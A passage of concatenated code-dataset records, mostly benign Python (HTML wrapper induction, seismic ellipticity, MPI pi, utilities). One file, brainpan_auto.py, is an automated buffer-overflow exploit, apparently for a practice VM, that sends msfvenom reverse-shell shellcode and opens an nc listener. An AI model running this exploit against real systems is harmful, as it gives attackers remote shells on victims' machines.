'+str(np.argmax(y_predict)))\r\nplt.show()","sub_path":"Exercise37.py","file_name":"Exercise37.py","file_ext":"py","file_size_in_byte":6359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"88126462","text":"#!/usr/bin/env python\n\nimport socket\nimport struct\nimport multiprocessing\nimport sys\nimport argparse\nimport subprocess, os\nimport time\nimport threading\n\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('-T', '--target', required=True)\n\tparser.add_argument('-Pt', '--port', required=False)\n\tparser.add_argument('-Pd', '--payload', required=True)\n\tparser.add_argument('-LH', '--listen-host', required=True)\n\tparser.add_argument('-LP', '--listen-port', required=False)\n\tparser.add_argument('-NS', '--no-shell', required=False, action=\"store_true\")\n\tparser.add_argument('-QS', '--quiet-shellcode', required=False, action=\"store_true\")\n\targs = vars(parser.parse_args())\n\n\thost = args['target']\n\tpayload = args['payload']\n\tlhost = args['listen_host']\n\t\n\tif args['no_shell']:\n\t\trev_shell = \"print(\\\"Executing...\\\")\"\n\telse:\n\t\trev_shell = \"t = threading.Thread(target=netcat).start();\" \n\t\trev_shell += \"sys.stdout.write(\\\"[Shell Listener Started]\\\")\"\n\t\n\tif not args['port']:\n\t\tport = 9999\n\telse:\n\t\tport = int(args['port'])\n\t\n\tif not args['listen_port']:\n\t\tlport = 4444\n\telse:\n\t\tlport = int(args['listen_port'])\n\nclass sock(object):\n\tdef tcp(self):\n\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\treturn s\n\tdef udp(self):\n\t\ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\t\treturn s\n\n\ndef configure():\n\ttry:\n\t\tnew_sockfd = sock().tcp()\n\t\treturn new_sockfd\n\texcept Exception as e:\n\t\treturn e\ndef connect(sock,host,port):\n\ttry:\n\t\tsock.connect((host,int(port)))\n\t\treturn True\n\texcept Exception as e:\n\t\treturn e\ndef send(sockfd, data):\n\ttry:\n\t\tsockfd.send(data)\n\t\treturn True\n\texcept:\n\t\treturn False\n\n\ntry:\n\tsys.stdout.write(\"\\n\\nCONFIGURING SOCKET ... \")\n\tsockfd = configure()\n\tif sockfd:\n\t\tsys.stdout.write(\"DONE\\n\")\n\telse:\n\t\tsys.stdout.write(\"FAILED\\n\")\n\t\tprint(sockfd)\nexcept Exception as err:\n\tsys.stdout.write(\"FAILED\\n{}\".format(str(err)))\n\tsys.exit()\n\n\ntry:\n\tsys.stdout.write(\"CONNECTING SOCKET ... \")\n\tif connect(sockfd,host,port) == True:\n\t\tsys.stdout.write(\"DONE\\n\")\n\telse:\n\t\tsys.stdout.write(\"FAILED\\n\")\n\t\tsys.exit()\nexcept Exception as err:\n\tsys.stdout.write(\"FAILED\\n{}\".format(str(err)))\n\tsys.exit()\n\nprint(\"\\x0a\\nGENERATING SHELLCODE:\\n- %s\\n- %s : %d\\n- bdchrs \\\\x00\\\\x0a\\\\x0d\"%(payload,lhost,lport))\nlipudp = sock().udp()\nconnect(lipudp,'8.8.8.8',53)\nlocalip = lipudp.getsockname()[0].__str__()\nlipudp.close()\ncommand = r\"msfvenom -p %s LHOST=%s LPORT=%d -f python R -v buf -b '\\x00\\x0a\\x0d'\" \\\n\t\t%(payload.__str__(), lhost, lport)\ncmd = subprocess.Popen(command,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\nshc = cmd.stdout.read()\nexec(shc)\nsys.stdout.write(\"\\n\\nSTDOUT Shellcode Output:\\n\")\ntime.sleep(2)\nif not args['quiet_shellcode']:\n\tprint(buf.replace(\"\\n\", \"\").replace(\"\\x0a\", \"\").__repr__())\nelse:\n\tsys.stdout.write(\"- \"+buf[:2].__repr__().replace(\"'\", \"\")); sys.stdout.write(\"...\"); sys.stdout.write(buf[len(buf)-3:len(buf)].__repr__().replace(\"'\", \"\"))\ntime.sleep(2)\nsys.stdout.write(\"\\n\\n\\nCONSTRUCTING PAYLOAD ... \")\nshellcode = ((\"\\x41\"*524)+\"\\xf3\\x12\\x17\\x31\"+(\"\\x90\"*40)+buf+(\"\\x43\"*(1024-524-4-40-len(buf))))\nsys.stdout.write(\"DONE\\n\")\nsys.stdout.write(\"- OVERFLOW: 524 Bytes\\n- JMP ESP: \\\\xf3\\\\x12\\\\x17\\\\x31\\n- NOP: 40x\\\\x90\\n- Shellcode: %d Bytes\\n- BUFFER FILL: %d\\n\\n\\n\"%(len(buf), (1024-524-4-40-len(buf))))\ntime.sleep(1.8)\nsys.stdout.write(\"SENDING EXPLOIT => \")\n\ndef netcat():\n\tos.system(\"nc -lvp \"+str(lport))\ndef exploit():\n\texploited = send(sockfd, shellcode)\n\tif exploited:\n\t\tsys.stdout.write(\"\\nExploit Complete\\n\\n\")\n\t\treturn True\n\telse:\n\t\tsys.stdout.write(\"\\nExploit Failed\\n\\n\")\n\t\treturn False\n\nexec(rev_shell)\nx = threading.Thread(target=exploit).start()\nprint('\\n')\n","sub_path":"brainpan_auto.py","file_name":"brainpan_auto.py","file_ext":"py","file_size_in_byte":3722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"101104060","text":"from collections import namedtuple\n\nimport numpy\n\nfrom ._base import Base\nfrom ._eigen import EigenFunction\n\n__all__ = [\n \"RayleighEllipticity\",\n \"Ellipticity\",\n]\n\n\nRayleighEllipticity = namedtuple(\"RayleighEllipticity\", (\"period\", \"ellipticity\"))\n\n\nclass Ellipticity(Base):\n def __init__(\n self, thickness, velocity_p, velocity_s, density, algorithm=\"dunkin\", dc=0.005,\n ):\n \"\"\"\n Ellipticity class (only Rayleigh-wave).\n\n Parameters\n ----------\n thickness : array_like\n Layer thickness (in km).\n velocity_p : array_like\n Layer P-wave velocity (in km/s).\n velocity_s : array_like\n Layer S-wave velocity (in km/s).\n density : array_like\n Layer density (in g/cm3).\n algorithm : str {'dunkin', 'fast-delta'}, optional, default 'dunkin'\n Algorithm to use for computation of Rayleigh-wave dispersion:\n - 'dunkin': Dunkin's matrix (adapted from surf96),\n - 'fast-delta': fast delta matrix (after Buchen and Ben-Hador, 1996).\n dc : scalar, optional, default 0.005\n Phase velocity increment for root finding.\n\n \"\"\"\n super().__init__(thickness, velocity_p, velocity_s, density, algorithm, dc)\n\n def __call__(self, t):\n \"\"\"\n Compute Rayleigh-wave ellipticity for input period axis.\n\n Parameters\n ----------\n t : array_like\n Periods (in s).\n\n Returns\n -------\n namedtuple\n Rayleigh-wave ellipticity as a namedtuple (period, ellipticity).\n\n \"\"\"\n eigf = EigenFunction(\n self._thickness,\n self._velocity_p,\n self._velocity_s,\n self._density,\n self._algorithm,\n self._dc,\n )\n\n eigs = [eigf(tt, mode=0, wave=\"rayleigh\") for tt in t]\n ell = [eig.ur[0] / eig.uz[0] for eig in eigs]\n\n return RayleighEllipticity(t, numpy.array(ell))\n","sub_path":"disba/_ellipticity.py","file_name":"_ellipticity.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"248005346","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nfrom dmpling.dmp import DMP\n\nT = 2.0\ndt = 1e-2\na = 10\nb = a / 4\nn_bfs = 100\n\nt = np.arange(0, T, dt)\nf = 1 / T\npath2 = np.sin(2*np.pi*f*t)\npath1 = np.cos(2*np.pi*f*t)\n\n# define dmps\ndmp1 = DMP(T, dt, n_bfs=n_bfs, a=a, b=b)\ndmp1.fit(path1)\n\ndmp2 = DMP(T, dt, n_bfs=n_bfs, a=a, b=b)\ndmp2.fit(path2)\n\n# run\ny1 = np.zeros(dmp1.cs.N)\ny2 = np.zeros(dmp1.cs.N)\n\nfor i in range(dmp1.cs.N):\n y1[i], _, _, _ = dmp1.step(k=1.5)\n y2[i], _, _, _ = dmp2.step(k=1.5)\n\nplt.plot(path1, path2)\nplt.plot(y1, y2)\n\nplt.axis('equal')\nplt.xlim([path1.min()*2, path1.max()*2])\nplt.ylim([path2.min()*2, path2.max()*2])\nplt.show()\n\nexit()\nfor i in range(dmp1.cs.N):\n y1[i], _, _, _ = dmp1.step()\n y2[i], _, _, _ = dmp2.step()\n plt.scatter(y1[i], y2[i], c='orange')\n plt.pause(0.02)\n","sub_path":"examples/dmp_2D.py","file_name":"dmp_2D.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"145295434","text":"from RRHtmlParser import RRHtmlParser, Element\nfrom copy import deepcopy\n\n\nclass RoadRunner:\n wrapper = None\n sample = None\n sample_idx = 0\n wrapper_idx = 0\n\n def __init__(self, wrapper_path, sample_path):\n parser = RRHtmlParser()\n parser.data = []\n start = parser.last_idx + 1\n html_data = parser.preprocess_html_file(wrapper_path)\n parser.feed(html_data)\n self.wrapper = deepcopy(parser.data[start:])\n start = parser.last_idx + 1\n html_data = parser.preprocess_html_file(sample_path)\n parser.feed(html_data)\n self.sample = deepcopy(parser.data[start:])\n\n def __repr__(self):\n out = ''\n flag = False\n for el in self.wrapper:\n if el.is_square_start:\n flag = True\n elif el.is_square_end:\n flag = False\n out += str(el) + ('\\n' if not flag else ' ')\n return out\n\n def square_match(self, lower_idx, upper_idx, on_wrapper=True):\n \"\"\"\n :param lower_idx: next_terminal_idx\n :param upper_idx: terminal_idx\n :param on_wrapper: search on wrapper or sample\n :return: None or tag list\n \"\"\"\n data = self.wrapper if on_wrapper else self.sample\n square = []\n data_a = data[upper_idx + 1:lower_idx + 1] # --------\n data_a.reverse() # so zip()\n data_b = data[0:upper_idx + 1] # works\n data_b.reverse() # --------\n for lower_el, upper_el in zip(data_a, data_b):\n if lower_el == upper_el:\n square.append(lower_el)\n continue\n elif not lower_el.is_tag and not upper_el.is_tag and lower_el != upper_el:\n square.append(Element(\"#TEXT\", None, False, False))\n else:\n return None\n\n square.reverse() # Putting square elements in correct order, since We were adding it in reverse\n return square\n\n def find_square(self):\n terminal_tag = self.wrapper[self.wrapper_idx - 1]\n square = None\n w_flag = False\n\n # finding square in wrapper\n idx = self.wrapper_idx # We assume iterator continues on wrapper\n while idx < len(self.wrapper):\n if self.wrapper[idx] == terminal_tag: # We found another terminal tag on wrapper\n square = self.square_match(idx, self.wrapper_idx - 1) # We try to match square\n if square is not None:\n w_flag = True # We found it on wrapper!\n break\n idx += 1\n\n # finding square in sample\n idx = self.sample_idx # We assume iterator continues on sample\n while idx < len(self.sample) and square is None:\n if self.sample[idx] == terminal_tag: # we found another terminal tag on sample\n square = self.square_match(idx, self.sample_idx - 1, on_wrapper=False) # We try to match square\n if square is not None:\n break # We found it on sample!\n idx += 1\n\n if square is None: # We didn't find a square so it must be an optional\n return False\n\n square[0].is_square_start = True\n square[-1].is_square_end = True\n\n # finding the first and last occurence of square\n start_iterator_idx = self.wrapper_idx\n end_iterator_idx = start_iterator_idx # + len(square)\n\n while 0 <= start_iterator_idx:\n if self.wrapper[start_iterator_idx - len(square)] != square[0]:\n break\n start_iterator_idx -= len(square)\n\n while end_iterator_idx < len(self.wrapper):\n tmp_idx = end_iterator_idx + len(square) - (1 if w_flag else 0) # For any future questions: Just because!\n if tmp_idx >= len(self.wrapper) or self.wrapper[tmp_idx] != square[-1]:\n break\n end_iterator_idx += len(square)\n\n # removing squares from wrapper\n for i in range(start_iterator_idx, end_iterator_idx):\n self.wrapper.pop(start_iterator_idx)\n # inserting square into wrapper\n for el in square:\n self.wrapper.insert(start_iterator_idx, el)\n start_iterator_idx += 1\n # set wrapper index on the end of square iterator\n self.wrapper_idx = start_iterator_idx\n\n while True:\n tmp_idx = self.sample_idx + len(square) - 1\n if tmp_idx >= len(self.sample):\n break\n elif self.sample[tmp_idx] == terminal_tag:\n self.sample_idx += len(square)\n else:\n break\n return True\n\n def find_iterator(self):\n # prevous tags do not match, so we certainly are not on iterator\n if self.wrapper[self.wrapper_idx - 1] != self.sample[self.sample_idx - 1]:\n return False\n return self.find_square()\n\n def find_optional(self):\n wrapper_mismatch = self.wrapper[self.wrapper_idx]\n sample_mismatch = self.sample[self.sample_idx]\n w_idx = self.wrapper_idx + 1\n s_idx = self.sample_idx + 1\n\n while w_idx < len(self.wrapper) and s_idx < len(self.sample):\n if self.wrapper[w_idx] == sample_mismatch:\n for el in self.wrapper[self.wrapper_idx:w_idx]:\n el.is_optional = True\n self.wrapper_idx += 1\n return\n elif self.sample[s_idx] == wrapper_mismatch:\n for el in self.sample[self.sample_idx:s_idx]:\n el.is_optional = True\n self.wrapper.insert(self.wrapper_idx, el)\n self.wrapper_idx += 1\n self.sample_idx += 1\n return\n else:\n w_idx += 1\n s_idx += 1\n self.sample_idx += 1\n self.wrapper_idx += 1\n return\n\n def main(self):\n while self.wrapper_idx < len(self.wrapper) and self.sample_idx < len(\n self.sample): # run until the end of either the wrapper or sample\n sample_element = self.sample[self.sample_idx]\n wrapper_element = self.wrapper[self.wrapper_idx]\n\n if sample_element == wrapper_element: # check for tag mismatch, if the elements match, we continue\n self.wrapper_idx += 1\n self.sample_idx += 1 # increment indexes\n continue\n\n # elements do not match, we could have a string mismatch\n # or we have a tag mismatch, which could represent a iterator\n # or an optional element,\n\n if not sample_element.is_tag and not wrapper_element.is_tag and sample_element != wrapper_element:\n self.wrapper[self.wrapper_idx] = Element(\"#TEXT\", None, False,\n False) # Mark the element in the wrapper as a # TEXT\n\n self.wrapper_idx += 1\n self.sample_idx += 1 # increment indexes\n\n # from here on, we either stumbled upon an optional element,\n # or an iterator. We first check whether the element is an iterator,\n # if its not, it must be an optional element.\n else:\n result = self.find_iterator()\n if not result:\n self.find_optional()\n\n\nif __name__ == '__main__':\n # test pages\n wrapper_path = '../input-extraction/test_pages/test_page_2.html'\n sample_path = '../input-extraction/test_pages/test_page_1.html'\n output_path = '../input-extraction/test_pages/wrapper12.html'\n\n # alstore\n # wrapper_path = '../input-extraction/altstore.si/Gaming prenosniki ASUS - AltStore.html'\n # sample_path = '../input-extraction/altstore.si/Gaming prenosniki ACER - AltStore.html'\n # output_path = '../input-extraction/altstore.si/wrapper12.html'\n\n # rtv\n wrapper_path = '../input-extraction/rtvslo.si/Audi A6 50 TDI quattro_ nemir v premijskem razredu - RTVSLO.si.html'\n sample_path = '../input-extraction/rtvslo.si/Volvo XC 40 D4 AWD momentum_ suvereno med najboljše v razredu - RTVSLO.si.html'\n output_path = '../input-extraction/rtvslo.si/wrapper12.html'\n\n # overstock\n # wrapper_path = '../input-extraction/overstock.com/jewelry01.html'\n # sample_path = '../input-extraction/overstock.com/jewelry02.html'\n # output_path = '../input-extraction/overstock.com/wrapper12.html'\n\n rr = RoadRunner(wrapper_path, sample_path)\n rr.main()\n print(rr)\n with open(output_path, 'w') as file:\n file.write(str(rr))\n","sub_path":"pa2/implementation-extraction/road_runner.py","file_name":"road_runner.py","file_ext":"py","file_size_in_byte":8577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"455578640","text":"from mpi4py import MPI\nfrom random import random\nimport time\n\ntimeStartTotal = time.clock()\n\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\nsize = comm.Get_size()\n\n#calculatin Pi Function\ndef calPi(n):\n\tinside = 0\n\tfor i in range(n):\n\t\tx = random()\n\t\ty = random()\n\t\tif x**2 + y**2 <= 1:\n\t\t\tinside += 1\n\treturn(inside)\n\n#Master\nif rank == 0:\n\t# Pi Calculation\n\trangeNumber = 10**8\n\t# print('This is rank 0 sending %s as range to slaves for calculation' %(rangeNumber))\n\tcomm.send(rangeNumber,dest=1,tag=11)\n\tcomm.send(rangeNumber,dest=2,tag=11)\n\tinside1 = comm.recv(source=1, tag=11)\n\tinside2 = comm.recv(source=2, tag=11)\n\tprint('# form rank 1:',inside1)\n\tprint('# form rank 2:',inside2)\n\tpi = 4*(inside1+inside2)/(rangeNumber*2)\n\tprint(\"Calculated Pi: \",pi)\n\n\t#Time Calculation\n\ttimeEnd1 = comm.recv(source=1, tag=12)\n\tprint('Time to proccess for rank1: ',timeEnd1)\n\ttimeEnd2 = comm.recv(source=2, tag=12)\n\tprint('Time to proccess for rank2:',timeEnd2)\n\tprint('Average time for each proccess:',(timeEnd1+timeEnd2)/2)\n\ttimeEndTotal = (time.clock() - timeStartTotal)\n\tprint('Total time to proccess:',timeEndTotal)\n\n#Slave 1\nif rank == 1:\n\ttimeStart1 = MPI.Wtime()\n\tdata = comm.recv(source=0,tag=11)\n\tinside1 = calPi(data)\n\tcomm.send(inside1, dest=0, tag=11)\n\ttimeEnd1 = MPI.Wtime() - timeStart1\n\tprint('1',timeEnd1)\n\tcomm.send(timeEnd1, dest=0, tag=12)\t\n\t# print('This is rank 1 & got this range to calculate Pi from rank 0: ', data)\n\n#Slave 2\nif rank == 2:\n\ttimeStart2 = MPI.Wtime()\n\tdata = comm.recv(source=0, tag=11)\n\tinside2 = calPi(data)\n\tcomm.send(inside2, dest=0, tag=11)\n\ttimeEnd2 = MPI.Wtime() - timeStart2\n\tprint(timeEnd2)\n\tcomm.send(timeEnd2, dest=0, tag=12)\t\n\t# print('This is rank 2 & got this range to calculate Pi from rank 0: ', data)\n","sub_path":"mpi.py","file_name":"mpi.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"7225647","text":"import sys\nimport traceback\n\n\ndef is_overridden_func(func):\n # https://stackoverflow.com/questions/9436681/how-to-detect-method-overloading-in-subclasses-in-python\n obj = func.__self__\n base_class = getattr(super(type(obj), obj), func.__name__)\n return func.__func__ != base_class.__func__\n\n\ndef extract_detail():\n \"\"\"Extracts failing function name from Traceback\n by Alex Martelli\n http://stackoverflow.com/questions/2380073/how-to-identify-what-function-call-raise-an-exception-in-python\n \"\"\"\n tb = sys.exc_info()[-1]\n stk = traceback.extract_tb(tb, -1)[0]\n return \"{} in {} line num {} on line {} \".format(\n stk.name, stk.filename, stk.lineno, stk.line\n )\n\n\ndef get_details(fn):\n class_name = vars(sys.modules[fn.__module__])[\n fn.__qualname__.split(\".\")[0]\n ].__name__\n fn_name = fn.__name__\n if class_name == fn_name:\n return None, fn_name\n else:\n return class_name, fn_name\n","sub_path":"utils/function_util.py","file_name":"function_util.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"232621334","text":"from sys import maxsize\n\nclass Solution:\n minScoreDict = {}\n\n def minScoreTriangulation(self, A):\n if tuple(A) in self.minScoreDict:\n return self.minScoreDict[tuple(A)]\n elif len(A) == 3:\n return A[0] * A[1] * A[2]\n elif len(A) < 3:\n raise Exception(\"too few vertices\")\n else:\n minVal = maxsize\n lenA = len(A)\n if lenA == 4:\n lenA = 2\n for i in range(0, lenA):\n totalSum = A[i]*A[(i+1)%len(A)]*A[(i+2)%len(A)]\n A_subset = A[:]\n A_subset.pop((i+1)%len(A_subset))\n totalSum += self.minScoreTriangulation(A_subset)\n minVal = min(minVal, totalSum)\n self.minScoreDict[tuple(A)] = minVal\n return minVal\n\n #WRONG\n '''\n def minScoreTriangulationBruteForce(self, A):\n if len(A) == 3:\n return A[0] * A[1] * A[2]\n elif len(A) < 3:\n raise Exception(\"too few vertices\")\n else:\n minVal = maxsize\n for i in range(0, len(A)):\n print(\"{0}, {1}, {2}, {3}\".format(A[i], A[(i+1)%len(A)], A[(i+2)%len(A)], A[i] * A[(i+1)%len(A)] *A[(i+2)%len(A)]))\n totalSum = A[i] * A[(i+1)%len(A)] * A[(i+2)%len(A)]\n for j in range(0, len(A)-3):\n print(\"{0}, {1}, {2}, {3}\".format(A[i], A[(i+j+2)%len(A)], A[(i+j+3)%len(A)], A[i] * A[(i+j+2)%len(A)] * A[(i+j+3)%len(A)]))\n totalSum += (A[i] * A[(i+j+2)%len(A)] * A[(i+j+3)%len(A)])\n minVal = min(minVal, totalSum)\n print(\"total Sum - {0}\".format(totalSum))\n return minVal\n '''\n \nsol = Solution()\n#print(sol.minScoreTriangulation([10,6,8,5,4]))\n#print(sol.minScoreTriangulation([1,3,1,4,1,5]))\nprint(sol.minScoreTriangulation([38,76,69,32,24,35,82,30,86,77,92,3,35,20,84,67,23,58,94,10]))","sub_path":"minScoreTriangulation.py","file_name":"minScoreTriangulation.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"384488143","text":"import itertools as it\n\nimport numpy as np\nfrom Bio import SeqIO\n\n\ndef extract_kmer_frequencies(input, output, k, characters='nuc'):\n k = int(k)\n if characters == 'nuc':\n characters = 'AGCT'\n else:\n characters = 'ACDEFGHIKLMNPQRSTVWY'\n N = len(characters)**k\n kmer_tuples = it.product(characters, repeat=k)\n kmer_to_index = { ''.join(kmer): index for index, kmer in enumerate(kmer_tuples) }\n output_file = open(output, 'w')\n kmers = [''.join(kmer) for kmer in it.product(characters, repeat=k)]\n output_file.write(','.join(['header']+kmers))\n\n records = SeqIO.parse(input, 'fasta')\n bins = np.arange(N+1)\n for record in records:\n counts = np.zeros(N, dtype=np.int)\n ungapped_string = str(record.seq.ungap('-'))\n current_kmers = [ungapped_string[i:i+k] for i in range(len(ungapped_string)-k+1)]\n indices = [kmer_to_index[kmer] for kmer in current_kmers if kmer in kmer_to_index]\n kmer_counts, _ = np.histogram(indices, bins=bins)\n output_file.write('\\n'+record.name+',')\n output_file.write(','.join([str(i) for i in kmer_counts]))\n\n","sub_path":"src/extract_kmer_frequencies.py","file_name":"extract_kmer_frequencies.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"394137306","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Apr 20 11:06:07 2020\r\n\r\n@author: rjsem\r\n\"\"\"\r\n\r\n# Program To Read video \r\n# and Extract Frames \r\nimport cv2 \r\n\r\n# Function to extract frames \r\ndef FrameCapture(path): \r\n\t\r\n\t# Path to video file \r\n vidObj = cv2.VideoCapture(path) \r\n\r\n\t# Used as counter variable \r\n count = 0\r\n\r\n\t# checks whether frames were extracted \r\n success = 1\r\n\r\n while success: \r\n\r\n\t\t# vidObj object calls read \r\n\t\t# function extract frames \r\n success, image = vidObj.read() \r\n\r\n\t\t# Saves the frames with frame-count \r\n if success != 1: break\r\n \r\n cv2.imwrite(\"frame%d.jpg\" % count, image) \r\n\r\n count += 1\r\n \r\n vidObj.release()\r\n cv2.destroyAllWindows()\r\n# Driver Code \r\nif __name__ == '__main__': \r\n\r\n\t# Calling the function \r\n FrameCapture(\"C:\\\\Users\\\\rjsem\\\\Desktop\\\\Popeye\\\\Popeye.mp4\") \r\n","sub_path":"video_prep/VidToFrameImgs.py","file_name":"VidToFrameImgs.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"82256932","text":"# -*- coding: utf-8 -*-\nimport collections\nimport itertools\nimport sys\n\n\nclass Namespace(object):\n __slots__ = ['_dict']\n\n def __init__(self, values=None):\n self._dict = {}\n if values:\n self._dict.update(values)\n\n def __contains__(self, k):\n return k in self._dict\n\n\n def __getitem__(self, k):\n return self._dict[k]\n\n def __setitem__(self, k, v):\n self._dict[k] = v\n\n def __getattr__(self, k):\n try:\n return self._dict[k]\n except KeyError:\n try:\n return getattr(self._dict, k)\n except:\n raise\n # print \"DEBUG: unknown identifier:\", k\n # print \"DEBUG: known identifiers:\", self._dict.keys ( )\n # return 'Unknown identifier:%s' % k\n\n\ndef quoteattrs(attrs):\n \"\"\"\n Escape and quote a dict of attribute/value pairs.\n\n Escape &, <, and > in a string of data, then quote it for use as\n an attribute value. The \" character will be escaped as well.\n Also filter out None values.\n \"\"\"\n quoted = []\n for a, v in attrs.items():\n if v is None:\n continue\n if not isinstance(v, str):\n v = str(v, 'utf-8')\n\n v = u'\"' + v.replace(u\"&\", u\"&\"\n ).replace(u\">\", u\">\"\n ).replace(u\"<\", u\"<\"\n ).replace(u'\"', u\""\") + u'\"'\n quoted.append(u' %s=%s' % (a, v))\n return quoted\n\n\ndef escape(s):\n \"\"\"\n Escape &, <, and > in a string of data.\n \"\"\"\n return s.replace(\"&\", \"&\"\n ).replace(\">\", \">\"\n ).replace(\"<\", \"<\")\n\n\ndef caller():\n \"\"\"\n get the execution frame of the caller\n \"\"\"\n return sys._getframe(2)\n\n\nclass PrettyPrinter(object):\n \"\"\"not happy with this - should happen at the flattener level\"\"\"\n\n def __init__(self, indent=2):\n self.indent = indent\n self.current_indent = -indent\n self.output = []\n\n def start_element(self, name, attrs):\n self.current_indent += self.indent\n padding = ' ' * self.current_indent\n if attrs:\n self.output.append(\n padding +\n \"<%s%s>\" % (name, ''.join(quoteattrs(attrs)))\n )\n else:\n self.output.append(padding + \"<%s>\" % name)\n\n def end_element(self, name):\n padding = ' ' * self.current_indent\n self.output.append(padding + \"\" % name)\n self.current_indent -= self.indent\n\n def char_data(self, data):\n padding = ' ' * (self.current_indent + self.indent)\n self.output.append(padding + data)\n\n def parse(self, xmldata):\n from xml.parsers.expat import ParserCreate # @UnresolvedImport\n\n p = ParserCreate('utf-8')\n p.StartElementHandler = self.start_element\n p.EndElementHandler = self.end_element\n p.CharacterDataHandler = self.char_data\n p.Parse(xmldata)\n return '\\n'.join(self.output)\n\n\n\ndef izip_flat_pairs(pairs, fillvalue=None):\n it = iter(pairs)\n return itertools.zip_longest(it, it, fillvalue=fillvalue)\n\n\nclass odict(collections.OrderedDict):\n def __init__(self, *args, **kwds):\n \"\"\"\n Initialize an ordered dictionary. The signature is almost the same as regular dictionaries,\n but keyword arguments are not recommended because their insertion order is arbitrary.\n\n And additional:\n * If an even number of args is given, they are used as flat key value pairs.\n * Borrowed adict functionality for names without \"__\" in front\n\n \"\"\"\n if len(args) > 1:\n if len(args) % 2 != 0:\n raise TypeError('expected one or an even number of args, got %d' % len(args))\n args = izip_flat_pairs(args),\n super().__init__(*args, **kwds)\n\n def update(*args, **kwds): # @NoSelf\n ''' D.update([E, ]**F) -> None. Update D from mapping/iterable E and F.\n If E present and has a .keys() method, does: for k in E: D[k] = E[k]\n If E present and lacks .keys() method, does: for (k, v) in E: D[k] = v\n In either case, this is followed by: for k, v in F.items(): D[k] = v\n '''\n if not args:\n raise TypeError(\"descriptor 'update' of 'MutableMapping' object \"\n \"needs an argument\")\n self, *args = args\n if len(args) > 1:\n if len(args) % 2 != 0:\n raise TypeError('expected one or an even number of args, got %d' % len(args))\n args = izip_flat_pairs(args),\n if args:\n other = args[0]\n if isinstance(other, collections.Mapping):\n for key in other:\n self[key] = other[key]\n elif hasattr(other, \"keys\"):\n for key in other.keys():\n self[key] = other[key]\n else:\n for key, value in other:\n self[key] = value\n for key, value in kwds.items():\n self[key] = value\n\n def __getattr__(self, name):\n if name.startswith('__'):\n return super(odict, self).__getattr__(self, name)\n try:\n return self[name]\n except KeyError:\n raise self.__attr_error(name)\n\n def __setattr__(self, name, value):\n if name.startswith('_'):\n super(odict, self).__setattr__(name, value)\n else:\n self[name] = value\n\n def __delattr__(self, name):\n if name.startswith('_'):\n super(odict, self).__delattr__(name)\n\n try:\n del self[name]\n except KeyError:\n raise self.__attr_error(name)\n\n def __attr_error(self, name):\n return AttributeError(\"type object '{subclass_name}' has no attribute '{attr_name}'\"\n .format(subclass_name=type(self).__name__, attr_name=name))\n\n def copy(self):\n return odict(dict.copy(self))\n","sub_path":"breve/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":6078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"16820439","text":"#1\n\nimport math\nn = int(input(\"Введите число: \"))\nprint (math.factorial(n))\n\n#2\n\ndef function(n):\n if n == 0:\n return 0\n elif n == 1:\n return 3\n elif n == 2:\n return 5\n elif n > 2:\n return(function(n-1) + function(n-2) + function(n-3))\nfor n in range(16):\n print(function(n)) \n\n#3\n\nx = int(input(\"Введите высоту треугольника:\"))\ny = 0\nwhile x > y:\n print (y * \"◘\")\n y += 1\nwhile y >= 1:\n print (y * \"◘\")\n y -= 1\nif x == 0:\n print (\"Так не бывает на свете, чтоб была высота у треугольника ноль\")\n\n#4\n\nimport math\nx = int(input(\"Первое число: \"))\ny = int(input(\"Второе число: \"))\ndef _gcd(x, y):\n return(gcd(x, y))\n\nprint(_gcd(x, y))\n\n#5\n\nimport math\nx = int(input(\"Первое число: \"))\ny = int(input(\"Второе число: \"))\ndef _lcm(x, y):\n return(lcm(x, y))\n\nprint(_lcm(x, y))\n","sub_path":"_10_02_21.py","file_name":"_10_02_21.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"218321575","text":"#第一种方法\n'''\ndef romanToInt1(s):\n result = 0\n curr = 0\n pre = 0\n for i in range(len(s)):\n if s[i] == 'I':\n curr = 1\n elif s[i] == 'V':\n curr = 5\n elif s[i] == 'X':\n curr = 10\n elif s[i] == 'L':\n curr = 50\n elif s[i] == 'C':\n curr = 100\n elif s[i] == 'D':\n curr = 500\n elif s[i] == 'M':\n curr = 1000\n\n result = result + curr\n\n if (pre < curr):\n result = result - 2 * pre\n pre = curr\n\n return result\n'''\n#第二种方法\ndef romanToInt1(s):\n d = {'I':1,'V':5,'X':10,'L':50,'C':100,'D':500,'M':1000}\n result = 0\n\n for i in range(len(s)-1):\n if d[s[i]] < d[s[i+1]]:\n result-= d[s[i]]\n else:\n result+=d[s[i]]\n\n result+=d[s[len(s)-1]]\n 